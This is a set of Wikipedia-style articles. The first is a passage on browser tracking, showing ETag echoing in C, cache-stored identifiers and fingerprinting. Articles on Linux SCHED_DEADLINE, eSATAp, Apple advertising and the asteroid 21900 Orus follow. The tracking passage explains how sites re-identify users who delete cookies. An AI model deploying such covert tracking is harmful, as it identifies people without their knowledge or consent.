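The tracking logic reduces to a single decision on the server: if the browser presented an ETag in its If-None-Match request header, echo it back; otherwise mint a new identifier. The hypothetical C helper below sketches that decision; it is not taken from any real server.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Return the ETag header value to send back; the caller frees the result. */
static char *choose_etag(const char *if_none_match)
{
    char *etag = malloc(64);
    if (etag == NULL)
        return NULL;
    if (if_none_match != NULL && *if_none_match != '\0') {
        /* Repeating the received value keeps the same identifier attached
           to this browser for as long as the cached resource survives. */
        snprintf(etag, 64, "%s", if_none_match);
    } else {
        /* First visit: mint a fresh identifier (timestamp plus random). */
        snprintf(etag, 64, "\"%lx-%x\"", (unsigned long)time(NULL), rand());
    }
    return etag;
}

int main(void)
{
    srand((unsigned)time(NULL));
    char *first = choose_etag(NULL);   /* new visitor gets an identifier */
    char *again = choose_etag(first);  /* returning visitor keeps it     */
    printf("assigned:  ETag: %s\n", first);
    printf("persisted: ETag: %s\n", again);
    free(first);
    free(again);
    return 0;
}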
Web storage
Some web browsers support persistence mechanisms which allow the page to store the information locally for later use.
The HTML5 standard (which most modern web browsers support to some extent) includes a JavaScript API called Web storage that allows two types of storage: local storage and session storage. Local storage behaves similarly to persistent cookies, while session storage behaves similarly to session cookies, except that session storage is tied to an individual tab or window's lifetime (also known as a page session), not to a whole browser session like session cookies.
Internet Explorer supports persistent information in the browser's history, in the browser's favorites, in an XML store ("user data"), or directly within a web page saved to disk.
Some web browser plugins include persistence mechanisms as well. For example, Adobe Flash has Local shared object and Microsoft Silverlight has Isolated storage.
Browser cache
The browser cache can also be used to store information that can be used to track individual users. This technique takes advantage of the fact that the web browser will use resources stored within the cache instead of downloading them from the website when it determines that the cache already has the most up-to-date version of the resource.
For example, a website could serve a JavaScript file with code that sets a unique identifier for the user (for example, var userId = 3243242;). After the user's initial visit, every time the user accesses the page, this file will be loaded from the cache instead of downloaded from the server. Thus, its content will never change.
Browser fingerprint
A browser fingerprint is information collected about a browser's configuration, such as version number, screen resolution, and operating system, for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.
Basic web browser configuration information has long been collected by web analytics services in an effort to accurately measure real human web traffic and discount various forms of click fraud. With the assistance of client-side scripting languages, collection of much more esoteric parameters is possible. Assimilation of such information into a single string constitutes a device fingerprint. In 2010, EFF measured at least 18.1 bits of entropy possible from browser fingerprinting, which corresponds to a fingerprint shared, on average, by only about one in 2^18.1 (roughly 280,000) browsers. Canvas fingerprinting, a more recent technique, claims to add another 5.7 bits.
See also
Dynamic HTML
Enterprise JavaBeans
Session (computer science)
Secure cookie
HTTP Strict Transport Security § Privacy issues
References
Sources
Anonymous (2011). "Cookiejacking Attack Steals Website Access Credentials". InformationWeek Online, May 26, 2011.
External links
RFC 6265, the current official specification for HTTP cookies
HTTP cookies, Mozilla Developer Network
Using cookies via ECMAScript, Mozilla Developer Network
Cookies at the Electronic Privacy Information Center (EPIC)
Mozilla Knowledge-Base: Cookies
Cookie Domain, explains in detail how cookie domains are handled in current major browsers
Cookie Stealing - Michael Pound
Check cookies for compliance with EU cookie directive
Computer access control
Cookie
Internet privacy
Web security exploits
Wikipedia articles with ASCII art
Hacking (computer security)
Tracking
|
30419009
|
https://en.wikipedia.org/wiki/SCHED%20DEADLINE
|
SCHED DEADLINE
|
SCHED_DEADLINE is a CPU scheduler available in the Linux kernel since version 3.14, based on the Earliest Deadline First (EDF) and Constant Bandwidth Server (CBS) algorithms, supporting resource reservations: each task scheduled under such policy is associated with a budget Q (aka runtime), and a period P, corresponding to a declaration to the kernel that Q time units are required by that task every P time units, on any processor. This makes SCHED_DEADLINE particularly suitable for real-time applications, like multimedia or industrial control, where P corresponds to the minimum time elapsing between subsequent activations of the task, and Q corresponds to the worst-case execution time needed by each activation of the task.
Background on CPU schedulers in the Linux kernel
The Linux kernel contains different scheduler classes. By default, the kernel uses a scheduler mechanism called the Completely Fair Scheduler (CFS), introduced in version 2.6.23 of the kernel. Internally, this default scheduler class is also known as SCHED_NORMAL, and the kernel also contains two POSIX-compliant real-time scheduling classes named SCHED_FIFO (realtime first-in-first-out) and SCHED_RR (realtime round-robin), both of which take precedence over the default class. The SCHED_DEADLINE scheduling class was added to the Linux scheduler in version 3.14 of the Linux kernel mainline, released on 30 March 2014, and takes precedence over all the other scheduling classes.
The default scheduler, CFS, does a very good job of coping with different use cases. For example, when mixing batch workloads, such as long-running code compilations or number crunching, with interactive applications, such as desktop applications, multimedia or others, CFS dynamically de-prioritizes batch tasks in favour of interactive ones. However, when an application needs a predictable and precise schedule, it normally has to resort to one of the other real-time schedulers, SCHED_RR or SCHED_FIFO, which schedule tasks according to fixed priorities and whose tasks are scheduled before any task in the SCHED_NORMAL class.
Operation
When mixing real-time workloads with heterogeneous timing requirements on the same system, a well-known problem of SCHED_RR and SCHED_FIFO is that, as these are based on tasks priorities, higher-priority tasks running for longer than expected may arbitrarily delay lower-priority tasks in an uncontrolled way.
With SCHED_DEADLINE, instead, tasks independently declare their timing requirements, in terms of a per-task runtime needed every per-task period (and due within a per-task deadline after each period start), and the kernel accepts them in the scheduler after a schedulability test. Now, if a task tries to run for longer than its assigned budget, the kernel suspends that task and defers its execution to its next activation period. This non-work-conserving property of the scheduler allows it to provide temporal isolation among the tasks. This results in the important property that, on single-processor systems, or on partitioned multi-processor systems (where tasks are partitioned among available CPUs, so each task is pinned to a specific CPU and cannot migrate), all accepted SCHED_DEADLINE tasks are guaranteed to be scheduled for an overall time equal to their budget in every time window of length equal to their period, unless the task itself blocks and does not need to run. Also, a peculiar property of the CBS algorithm is that it guarantees temporal isolation also in the presence of tasks blocking and resuming execution: this is done by resetting a task's scheduling deadline to a whole period apart whenever a task wakes up too late. In the general case of tasks free to migrate on a multi-processor, as SCHED_DEADLINE implements global EDF, the general tardiness bound for global EDF applies.
In order to better understand how the scheduler works, consider a set of SCHED_DEADLINE tasks with potentially different periods, but with deadline equal to the period. For each task, in addition to the configured runtime and (relative) period, the kernel keeps track of a current runtime and a current (absolute) deadline. Tasks are scheduled on CPUs based on their current deadlines, using global EDF. When a task's scheduling policy is initially set to SCHED_DEADLINE, the current deadline is initialized to the current time plus the configured period, and the current budget is set equal to the configured budget. Each time a task is scheduled to run on any CPU, the kernel lets it run for at most the available current budget, and whenever the task is descheduled its current budget is decreased by the amount of time it has run. Once the current budget reaches zero, the task is suspended (throttled) until the next activation period, when the current budget is refilled to the configured value and the deadline is moved forward by a value equal to the task period.
This is not sufficient to guarantee temporal isolation. A task suspending itself shortly after its activation, and then waking up close to its current deadline or even beyond it, would wake up with nearly the whole of its configured budget but with a current deadline that is very close to expiring, or even in the past. In such a condition, that task would be scheduled before any other one, and on a single-processor system it would be able to delay execution of any other deadline task for as long as its budget. In order to avoid this problem, SCHED_DEADLINE adopts the wake-up scheduling rule defined in the CBS algorithm. When a task wakes up, if a relatively short time has elapsed since the task blocked, then the previous current deadline and budget are kept unchanged for the task. However, if an excessive amount of time has elapsed, then the kernel resets the current deadline to the current time plus the reservation period, and the current budget to the allocated reservation budget. A longer explanation with examples can be found in the documentation and the lwn.net article referenced below.
On a multi-processor or multi-core system, SCHED_DEADLINE implements global EDF, so tasks are able to migrate across available CPUs. In such a case, the configured budget is the total cumulative amount of time the task is allowed to run on any CPU during each period. However, the scheduler also respects tasks' affinity masks, so one can easily create partitioned scheduling scenarios, partitioning tasks in groups where each group is restricted to a specific CPU, or clustered scheduling scenarios, obtained by also partitioning CPUs and pinning each task partition to a specific CPU partition.
For technical details about SCHED_DEADLINE, refer to the documentation available within the kernel source tree.
For further details on the CBS and how it enables temporal isolation, refer to the original CBS paper, or to the section about the CBS in an article that appeared on lwn.net.
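As a concrete illustration, the sketch below shows how a task could declare a 10 ms runtime every 30 ms period through the sched_setattr() system call. The structure layout follows the sched_attr interface documented for the kernel, but the call has had no glibc wrapper on many systems (recent glibc versions may already provide one), so it is invoked here through syscall(); the numbers are only an example, and running it normally requires root privileges.

#define _GNU_SOURCE
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

#ifndef SCHED_DEADLINE
#define SCHED_DEADLINE 6
#endif

struct sched_attr {
    uint32_t size;
    uint32_t sched_policy;
    uint64_t sched_flags;
    int32_t  sched_nice;
    uint32_t sched_priority;
    uint64_t sched_runtime;   /* nanoseconds */
    uint64_t sched_deadline;  /* nanoseconds */
    uint64_t sched_period;    /* nanoseconds */
};

int main(void)
{
    struct sched_attr attr = {
        .size           = sizeof(attr),
        .sched_policy   = SCHED_DEADLINE,
        .sched_runtime  = 10 * 1000 * 1000,  /* Q = 10 ms of CPU time...      */
        .sched_deadline = 30 * 1000 * 1000,  /* ...due within 30 ms...        */
        .sched_period   = 30 * 1000 * 1000,  /* ...in every 30 ms period (P). */
    };

    /* Ask the kernel to admit this thread under SCHED_DEADLINE; the call
       fails if the schedulability test rejects the reservation. */
    if (syscall(SYS_sched_setattr, 0 /* this thread */, &attr, 0 /* flags */) < 0) {
        perror("sched_setattr");
        return 1;
    }

    for (;;) {
        /* Periodic real-time work would go here; the kernel throttles the
           task once the 10 ms budget of the current period is consumed. */
        sched_yield();
    }
}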
History
The initial idea of a Linux scheduling class based on the Earliest Deadline First (EDF) algorithm originated at the Real-Time Systems (ReTiS) Lab of Scuola Superiore Sant'Anna and its spin-off company Evidence Srl. Evidence Srl then leveraged funding from the ACTORS project, supported by the European Commission through the FP7 framework programme, to finance and promote the development of the first versions of the patch.
The original version was developed by Dario Faggioli (contracted by Evidence Srl for the development of the first three versions) and Juri Lelli (since the fourth version), with sporadic help from Michael Trimarchi and Fabio Checconi. Johan Eker was in charge of coordination within ACTORS, with support from Ericsson. Juri Lelli, Luca Abeni and Claudio Scordino collaborated on the development of the reclaiming (i.e. GRUB) and frequency-scaling (i.e. GRUB-PA) features.
The patch was periodically released to the kernel community through the Linux kernel mailing list (LKML). Each release aligned the code with the latest version of the kernel and took into account comments received on the previous submission.
As the popularity of the scheduler increased, a growing number of kernel developers started providing feedback and contributions.
The project was originally called SCHED_EDF and presented to the Linux kernel community in 2009. Under this name it was also presented to the Real-Time Linux Workshop a few weeks later. The name was then changed to SCHED_DEADLINE at the request of the Linux kernel community.
In the course of the years, the following versions have been released:
The first version of the scheduler was submitted on September 22, 2009, with the name of SCHED_EDF.
The first version of the scheduler after the name changed to SCHED_DEADLINE was submitted to LKML on October 16, 2009.
The second version of the scheduler was submitted to LKML on February 28, 2010, and included a first implementation of the Deadline Inheritance protocol.
The third version of the scheduler was submitted to LKML on October 29, 2010, and added support for global/clustered multiprocessor scheduling through dynamic task migrations.
The fourth version of the scheduler was submitted to LKML on April 6, 2012, with better handling of run-queue selection for dynamic task migration and better integration with PREEMPT_RT.
The fifth version of the scheduler was submitted to LKML on May 23, 2012.
The sixth version of the scheduler was submitted to LKML on October 24, 2012.
The seventh version of the scheduler was submitted to LKML on February 11, 2013. Internal math was restricted to microsecond resolution (to avoid overflows) and the RFC tag was removed.
The eighth version of the scheduler was submitted to LKML on October 14, 2013.
The ninth version of the scheduler was submitted to LKML on November 7, 2013.
The last version was merged into the mainline Linux kernel (commit number a0fa1dd3cdbccec9597fe53b6177a9aa6e20f2f8) and has since been a regular part of it.
Articles on the Linux Weekly News and Phoronix websites had argued that SCHED_DEADLINE might be merged into the mainline kernel in one of the next releases.
Finally, after more than four years and the submission of nine releases, the patch was accepted and merged into Linux kernel 3.14.
Before SCHED_DEADLINE, the Real-Time Systems (ReTiS) Lab of Scuola Superiore Sant'Anna had provided various other open-source implementations of CBS and its variants within the Linux kernel, in the context of other European research projects, including OCERA, the AQuoSA architecture within the FRESCOR project, and IRMOS. However, these prior efforts started with an academic approach where the main aim was to gather experimental results for research projects, rather than providing an implementation suitable for integration within the mainline kernel. With IRMOS, the lab had a first serious contact with Linux kernel developers.
Since kernel 4.13, SCHED_DEADLINE has complemented CBS with the Greedy Reclamation of Unused Bandwidth (GRUB) algorithm. The support was developed by the ReTiS Lab in collaboration with Evidence Srl.
Since kernel 4.16, SCHED_DEADLINE has been further evolved to reduce energy consumption on ARM platforms by implementing the GRUB-PA algorithm. The work was done by ARM Ltd. in collaboration with Evidence Srl and Scuola Superiore Sant'Anna.
Academic background
SCHED_DEADLINE has been presented at several academic workshops and conferences and in journals:
Dario Faggioli, Fabio Checconi, Michael Trimarchi, Claudio Scordino, An EDF scheduling class for the Linux kernel, 11th Real-Time Linux Workshop (RTLWS), Dresden, Germany, September 2009
Nicola Manica, Luca Abeni, Luigi Palopoli, Dario Faggioli, Claudio Scordino, Schedulable Device Drivers: Implementation and Experimental Results, International Workshop on Operating Systems Platforms for Embedded Real-Time Applications (OSPERT), Brussels, Belgium, July 2010
Juri Lelli, Giuseppe Lipari, Dario Faggioli, Tommaso Cucinotta, An efficient and scalable implementation of global EDF in Linux, International Workshop on Operating Systems Platforms for Embedded Real-Time Applications (OSPERT), Porto (Portugal), July 2011.
Enrico Bini, Giorgio Buttazzo, Johan Eker, Stefan Schorr, Raphael Guerra, Gerhard Fohler, Karl-Erik Arzen, Vanessa Romero Segovia, Claudio Scordino, Resource Management on Multicore Systems: The ACTORS Approach, IEEE Micro, vol. 31, no. 3, pp. 72–81, May/June 2011.
Andrea Parri, Juri Lelli, Mauro Marinoni, Giuseppe Lipari, Design and Implementation of the Multiprocessor Bandwidth Inheritance Protocol on Linux, 15th Real-Time Linux Workshop (RTLWS), Lugano-Manno, Switzerland, October 2013.
Luca Abeni, Juri Lelli, Claudio Scordino, Luigi Palopoli, Greedy CPU reclaiming for SCHED_DEADLINE, Proceedings of the 16th Real-Time Linux Workshop (RTLWS), Düsseldorf, Germany, October 2014.
Juri Lelli, Claudio Scordino, Luca Abeni, Dario Faggioli, Deadline scheduling in the Linux kernel, Software: Practice and Experience, 46(6): 821–839, June 2016.
Claudio Scordino, Luca Abeni, Juri Lelli, Energy-Aware Real-Time Scheduling in the Linux Kernel, 33rd ACM/SIGAPP Symposium On Applied Computing (SAC 2018), Pau, France, April 2018.
Claudio Scordino, Luca Abeni, Juri Lelli, Real-time and Energy Efficiency in Linux: Theory and Practice, ACM SIGAPP Applied Computing Review (ACR) Vol. 18 No. 4, 2018.
The project has been also presented at the Kernel Summit in 2010, at the Linux Plumbers Conference 2012, and at the Embedded Linux Conference 2013.
Other information
The project has an official page. Before mainline integration, the code was publicly available on GitHub, which replaced the previous repository on Gitorious. Since mainline integration, the official code has been included in the Linux kernel source tree.
Several articles have appeared on Linux Weekly News, Slashdot, OSNews and LinuxToday.
A video has been uploaded on YouTube as well.
Before integration in the mainline kernel, SCHED_DEADLINE was already integrated into the Yocto Project, and there had also been some interest in its inclusion in Linaro projects.
See also
Completely Fair Scheduler
References
Linux kernel process schedulers
Articles with underscores in the title
|
28383598
|
https://en.wikipedia.org/wiki/ESATAp
|
ESATAp
|
In computing, eSATAp (also known as Power over eSATA, Power eSATA, eSATA/USB Combo, eSATA USB Hybrid Port/EUHP) is a combination connection for external storage devices. An eSATA or USB device can be plugged into an eSATAp port. The socket has keyed cutouts for both types of device to ensure that a connector can only be plugged in the right way.
Standard
Although the port is designed to work with both SATA and USB, neither organization has formally approved it. The USB Implementers Forum states it does not support any connector used by other standards, hence such 'combo' ports are to be used at one's own risk. As of 2011, the organization responsible for the SATA specification, SATA-IO (Serial ATA International Organization), is working to define the eSATAp specification.
Implementation
SATA is a computer bus interface for connecting host bus adapters to mass storage devices such as hard disk drives and optical drives. eSATA is a SATA connector accessible from outside the computer, to provide a signal (but not power) connection for external storage devices.
eSATAp combines the functionality of an eSATA and a USB port, and a source of power in a single connector. eSATAp can supply power at 5 V and 12 V.
On a desktop computer the port is simply a connector, usually mounted on a bracket at the back accessible from outside the machine, connected to motherboard sources of SATA, USB, and power at 5 V and 12 V. No change is required to drivers, registry or BIOS settings and the USB support is independent of the SATA connection.
If advanced functionality such as a port multiplier is required, a PCI Express add-on card can be used. If it has port multiplier support, an eSATAp port allows a user to connect to a multi-bay NAS (network attached storage) machine with multiple hard disks (HDD) using one eSATA cable.
On many notebook computers only a limited amount of power at 5 V is available, and none at all at 12 V. Devices requiring more power than is available via the Expresscard, or an additional 12 V supply as required by most 3.5" or 5.25" drives, can be driven if an additional power supply is used. Cables are available to both connect and power a SATA device from an eSATAp port (including 12 V power if available).
Compatibility
eSATAp throughput is not necessarily the same as that of SATA: many enclosures and docks that support both eSATA and USB use combo bridge chips which can severely reduce throughput, and USB throughput is that of the USB version supported by the port (typically USB 3.0 or 2.0). eSATAp ports (bracket versions) can run at a theoretical maximum of 6 gigabits per second (Gbit/s) and are backwards compatible with devices such as eSATA 3 Gbit/s (SATA Revision 2) and 1.5 Gbit/s (SATA Revision 1). The USB port is fully compatible with USB 5 Gbit/s (USB 3.0), USB 480 Mbit/s (USB 2.0) and USB 12 Mbit/s (1.1); USB 3.0 devices are compatible, but will operate at USB 2.0 speed if the internal USB 3.0 connector is not connected.
+12 V issue
There are only two versions of this port. Most laptop computers do not have 12 V power available, and have an eSATAp port which provides only 5 V. Desktop computers, with 12 V available, have a port with two additional pads, placed against the plug's "horns", which provide 12 V. Some manufacturers refer to these ports as eSATApd, where d stands for "dual voltage". Some devices, such as 2.5-inch drives, can operate off the 5 V supplied by laptop eSATAp ports. Others, such as 3.5-inch drives, also require 12 V; they can be powered from a desktop eSATAp port, but require an external 12 V power supply if used with a laptop computer. This can lead to confusion if users are not aware of the distinction.
eSATAp PCI and PCI-e add-on cards are available for desktop computers. They usually provide two eSATAp ports, with port multiplier functionality, and hot-swap capability.
eSATAp cables are available with wide connectors to plug directly into the power and signal connectors of a bare drive, providing a 12 V supply in the case of a desktop machine. A version of this wide connector is found inside every external SATA hard drive enclosure; when the hard drive is slid inside, it mates with a connector that supplies it with both signal and power.
If the smaller side of this cable is plugged into a "powered" ESATA port, providing both 12 V and 5 V, then the wide end may be plugged into a 2.5" or 3.5" SATA hard drive, supplying the bare drive with both signal and power. The small 2.5" drive will get signal and power at 5 V, which is all that the smaller drive requires, and which the larger 3.5" drive requires only for its logic board. Additionally, the larger 3.5" drive will get the 12 V it needs to power its disk spindle motor. Thus a bare hard drive may be attached directly to the computer, powered by the unique cable, where it will run at full SATA speeds, without the necessity of placing the hard drive into an external enclosure.
Naming
The following names are used by different manufacturers for the same port:
eSATAp (Delock, Dynex, Lindy, Addonics)
eSATApd (Used by Delock to distinguish a port that supplies both +5 V and +12 V)
Power over eSATA (Delock, Micro-Star International (MSI))
eSATA/USB (Gigabyte Technology)
Power eSATA/USB (ASRock)
Other computer manufacturers, including Dell, HP, Lenovo, Sony and Toshiba, ship computers and motherboards with eSATAp ports.
Patents
US Patent US7572146B1 appears to document the eSATApd variant.
References
Bibliography
eSATA | SATA-IO
Upgrading and Repairing PCs: Upgrading and Repairing_c22
Moving Media Storage Technologies: Applications & Workflows for Video and Media Server Platforms
External links
eSATAp
eSATA USB hybrid (EUHP) connector pinout
Serial buses
USB
|
8260899
|
https://en.wikipedia.org/wiki/Apple%20Inc.%20advertising
|
Apple Inc. advertising
|
Apple Inc. has had many notable advertisements since the 1980s. The "1984" Super Bowl commercial introduced the original Macintosh, mimicking imagery from George Orwell's Nineteen Eighty-Four. The 1990s Think Different campaign linked Apple to famous social figures such as John Lennon and Mahatma Gandhi, while also introducing "Think Different" as a new slogan for the company. Other popular advertising campaigns include the 2000s "iPod People", the 2002 Switch campaign, and most recently the Get a Mac campaign, which ran from 2006 to 2009.
While Apple's advertisements have been mostly successful, they have also been met with controversy from consumers, artists and other corporations. For instance, the "iPod People" campaign was criticized for copying a campaign from a shoe company called Lugz. Another instance was when photographer Louie Psihoyos filed suit against Apple for using his "wall of videos" imagery to advertise for Apple TV without his consent.
1980–1985
A "Macintosh Introduction" 18-page brochure was included with various magazines in December 1983, often remembered because Bill Gates was featured on page 11. For a special post-election edition of Newsweek in November 1984, Apple spent more than $2.5 million to buy all of the advertising pages in the issue (a total of 39).
Apple also ran a "Test Drive a Macintosh" promotion that year, in which potential buyers with a credit card could try a Macintosh for 24 hours and return it to a dealer afterwards.
One ad contrasted the original Macintosh and its simple user brochure to the IBM Personal Computer with its stacks of complicated manuals.
"1984" television commercial: launching the Macintosh
"1984" (directed by Ridley Scott) is the title of the television commercial that launched the Macintosh personal computer in the United States, in January 1984.
The commercial was first aired nationally on January 22, 1984, during a break in the third quarter of Super Bowl XVIII. The ad showed an unnamed heroine (played by Anya Major) wearing orange shorts, red running shoes, and a white tank top with a Picasso-style picture of Apple's Macintosh computer, running through an Orwellian world to throw a sledgehammer at a TV image of Big Brother — an implied representation of IBM played by David Graham.
The concluding screen showed the message and voice over "On January 24th, Apple Computer will introduce Macintosh. And you'll see why 1984 won't be like '1984'." At the end, the "rainbow bitten" Apple logo is shown on a black background.
1985–1990
In 1985 the "Lemmings" commercial aired at the Super Bowl, a significant failure compared to the popular "1984."
Two years later, Apple released a short film titled Pencil Test to showcase the Macintosh II's animation capabilities.
1990–1995
In the 1990s, Apple launched the "What's on your PowerBook?" campaign. Print ads and television commercials featured celebrities describing how the PowerBook helped them in their businesses and everyday lives.
During 1995, Apple ran an infomercial called "The Martinetti's Bring Home a Computer" to sell Macintosh computers and promote its Performa line. The infomercial followed the fictional Martinetti family as they brought home their first computer and attempted to convince the father of the family to keep the computer by using it for various educational, business and other household purposes.
In the 1990s, Apple launched "Power" advertisements for its Power Macintosh.
Apple also responded to the introduction of Windows 95 with print ads and a television commercial.
1995–2000
"Think Different"
"Think Different" was an advertising slogan created by the New York branch office of advertising agency TBWA\Chiat\Day for Apple Computer during the late 1990s. It was used in a famous television commercial and several print advertisements. The slogan was used at the end of several product commercials, until the advent of Apple's Switch ad campaign. Apple no longer uses the slogan; its commercials usually end with a silhouetted Apple logo and sometimes a pertinent website address.
Television commercials
Significantly shortened versions of the text were used in two television commercials titled "Crazy Ones".
The one-minute commercial featured black and white video footage of significant historical people of the past, including (in order) Albert Einstein, Bob Dylan, Martin Luther King Jr., Richard Branson, John Lennon, R. Buckminster Fuller, Thomas Edison, Muhammad Ali, Ted Turner, Maria Callas, Mahatma Gandhi, Amelia Earhart, Alfred Hitchcock, Martha Graham, Jim Henson (with Kermit the Frog), Frank Lloyd Wright, and Picasso.
The thirty-second commercial used many of the same people, but closed with Jerry Seinfeld, instead of the young girl. In order: Albert Einstein, Bob Dylan, Martin Luther King, Jr., John Lennon, Martha Graham, Muhammad Ali, Alfred Hitchcock, Mahatma Gandhi, Jim Henson, Maria Callas, Picasso, and Jerry Seinfeld.
Print advertisements
Print advertisements from the campaign were published in many mainstream magazines such as Newsweek and Time. These were often traditional advertisements, prominently featuring the company's computers or consumer electronics along with the slogan. However, there was also another series of print ads which were more focused on Apple's brand image than specific products. They featured a portrait of one of the historic figures shown in the television ad, with a small Apple logo and the words "Think Different" in one corner (with no reference to the company's products).
2001–present
"Switch"
"Switch" was an advertising campaign launched by Apple on June 10, 2002. "The Switcher" was a term conjured by Apple, it refers to a person who changes from using the Microsoft Windows platform to the Mac. These ads featured what the company referred to as "real people" who had "switched". An international television and print ad campaign directed users to a website where various myths about the Mac platform were dispelled.
iPod
Apple has promoted the iPod and iTunes with several advertising campaigns, particularly with their silhouette commercials used both in print and on TV. These commercials feature people as dark silhouettes, dancing to music against bright-colored backgrounds. The silhouettes hold their iPods which are shown in distinctive white. The TV advertisements have used a variety of songs from both mainstream and relatively unknown artists, whilst some commercials have featured silhouettes of specific artists including Bob Dylan, U2, Eminem, Jet, The Ting Tings, Yael Naïm, CSS, Caesars, and Wynton Marsalis.
Successive TV commercials have also used increasingly complex animation. Newer techniques include the use of textured backgrounds, 3D arenas, and photo-realistic lighting on silhouette characters. The "Completely Remastered" ads (for the 2nd generation iPod nano) have a different design, in which the background is completely black.
The colored iPod nanos shine and glow, illuminating some of the dancers holding them, while moving iPod nanos leave a luminescent light trail. This is meant to show that the 2nd generation iPod nanos are colored. The silhouette commercials are a family of commercials in a similar style that form part of the advertising campaign to promote the iPod, Apple's portable digital music player.
"Get a Mac"
In 2006, Apple released a series of twenty-four "I'm a Mac, I'm a PC" advertisements as part of their "Get a Mac" campaign. The campaign officially ended in 2010 due to the introduction of the iPad.
The ads, which are directed by Phil Morrison, star actor Justin Long (Accepted) and author and humorist John Hodgman (The Daily Show) as a Macintosh (Mac) computer and a Windows PC, respectively.
Since the launch of the original ads, similar commercials have appeared in Japan and the UK. While they use the same form and music as the American ads, the actors are specific to those countries.
The UK ads feature famous comedy duo Mitchell and Webb, with David Mitchell as the Windows PC and Robert Webb as the Mac computer. The Japanese ones are played by Rahmens, with Jin Katagiri as the Windows PC and Kentarō Kobayashi as the Mac computer.
In April 2009, Justin Long revealed that the "Get a Mac" commercials "might be done". In May 2010, the "Get a Mac" campaign was officially ended, and the web pages began to redirect to a new "Why You'll Love Mac" page with more features on Macintosh hardware and software.
Genius ads
Apple debuted a new series of ads produced by TBWA\Media Arts Lab during television broadcasts of the 2012 Summer Olympics opening ceremony. The ads portrayed people in everyday situations being assisted by an employee from the company's Genius Bars. The ads were widely criticized, with some, including former TBWA\Chiat\Day creative director Ken Segall, remarking that they portrayed Apple customers as clueless.
iPhone Ads
Apple has aired many advertisements promoting the different models of the iPhone since its initial release in 2007. The company is well known for its advertising and marketing strategy, and segments its customer base using behavioral, demographic, and psychographic factors. In its iPhone advertising, Apple highlights the key features that it says set the product apart, such as performance, camera quality and privacy. One approach Apple uses is sending ordinary users out into the world to capture pictures and videos; the resulting ads show how the camera works and claim that such pictures can be taken by anyone, as long as they are shot on an iPhone rather than another brand's phone.
A second strategy is comparative advertising: ads that show the relative advantage the iPhone has over competitors' products, aimed at potential switchers currently using another smartphone brand. The iPhone advertising campaign took flight in 2007 and has continued into 2019.
Apple released the first advertisement for the iPhone in February 2007 during the national broadcast of the Academy Awards. The 30-second commercial featured cuts of famous figures answering their telephones, all saying "Hello". As it progressed, the ad showed more recent versions of the telephone; it ended with a preview of the first generation iPhone, drawing a connection between the iPhone and the telephones that came before it. Other features included in those advertisements were email, the camera, and general touchscreen capabilities.
In September 2016, the "Don't Blink" web video campaign was launched, which described the new Apple product line in 107 seconds with fast typography. It has since gone on to become an often-used video template on social media.
Apple Music Ads
Apple Music ads have had a consistent theme throughout recent years. Apple casts celebrities such as dancers and singers in its Apple Music commercials, as well as in its earbud commercials, which have starred dancers such as Lil Buck. In 2016, Taylor Swift appeared in a new Apple Music ad that featured a Drake song. Not only was this successful for Apple because of the humor of its plot line, but it also spurred a 431% jump in sales for Drake.
Criticism
Apple's advertising has come under criticism for adapting other creative works as advertisements and for inaccurate depictions of product functionality.
Some artists and unrelated businesses have complained that Apple's advertisements use their ideas. A 2005 iPod campaign starring rapper Eminem, called "Detroit", was criticized for being too similar to a 2002 advertisement for Lugz boots. A 2006 television advertisement was made by a director who had also made music videos for an American band, and the ad was criticized for being too similar to the music videos. Artist Christian Marclay denied Apple the rights to his 1995 short film "Telephones" to market Apple's iPhone, but Apple ran an ad during the 2007 Academy Awards broadcast that "seems like a tribute" to Marclay's experimental film. In July 2007, Colorado-based photographer Louie Psihoyos filed suit against Apple for using his "wall of videos" imagery to advertise for Apple TV. Apple had allegedly been negotiating with Psihoyos for rights to the imagery, but backed out and used similar imagery anyway. Psihoyos later dropped the lawsuit. Generally, copyright law prohibits copying specific expressions, but does not prohibit adapting ideas for other purposes, including as a tribute through allusions to works created by the honored artist.
In August 2008, the Advertising Standards Authority (ASA) in the UK banned one iPhone ad from further broadcast in its original form due to "misleading claims". The ASA took issue with the ads' claim that "all parts of the internet are on the iPhone", when the device did not support Java or Adobe's third-party Flash web browser plug-in. The newer iPhone ads presented a "Sequence Shortened" caption at the beginning.
In 2012 Apple was sued in Australia for branding its 2012 iPad as being 4G capable, even though the iPad was not compatible with Australia's 4G network. Apple offered a refund to customers for all iPads sold in Australia. Apple Inc. agreed to pay a A$2.25 million penalty for misleading Australian customers about its iPad being 4G capable.
References
External links
The Macintosh Marketing Campaign
Macintosh Television Advertising Over Thirty Years
Advertising campaigns
|
48246553
|
https://en.wikipedia.org/wiki/21900%20Orus
|
21900 Orus
|
21900 Orus is a Jupiter trojan from the Greek camp, approximately 51 kilometers in diameter, and a target of the Lucy mission, to be visited in November 2028. The dark Jovian asteroid is among the 100 largest Jupiter trojans and has a rotation period of 13.5 hours. It was discovered on 9 November 1999 by Japanese amateur astronomer Takao Kobayashi at his private Ōizumi Observatory in Gunma Prefecture, Japan, and later named Orus after a slain Achaean warrior from the Iliad.
Orbit and classification
Orus is a dark Jovian asteroid orbiting in the leading Greek camp at Jupiter's L4 Lagrangian point, 60° ahead of the planet on its orbit in a 1:1 resonance. It is also a non-family asteroid in the Jovian background population.
It orbits the Sun at a distance of 4.9–5.3 AU once every 11 years and 7 months (4,240 days; semi-major axis of 5.13 AU). Its orbit has an eccentricity of 0.04 and an inclination of 8° with respect to the ecliptic. The body's observation arc begins with a precovery, published by the Digitized Sky Survey and taken at Palomar Observatory in November 1951, or 48 years prior to its official discovery observation.
Lucy mission target
Orus is planned to be visited by the Lucy spacecraft, which was launched in 2021. The flyby is scheduled for 20 November 2028 and will approach the asteroid to a distance of 1,000 kilometers at a velocity of 7.1 kilometers per second.
Physical characteristics
Orus is characterized as a D-type and C-type asteroid by the Lucy mission team and by the PanSTARRS photometric survey, respectively. It has a V–I color index of 0.95, as seen among most larger D-type Jupiter trojans.
Lightcurve
The first photometric observations of Orus were made in October 2009 by astronomer Stefano Mottola in a photometric lightcurve survey of 80 Jupiter trojans, using the 1.2-meter telescope at Calar Alto Observatory. The obtained rotational lightcurve rendered a period of approximately 13.5 hours with a brightness variation of 0.18 magnitude.
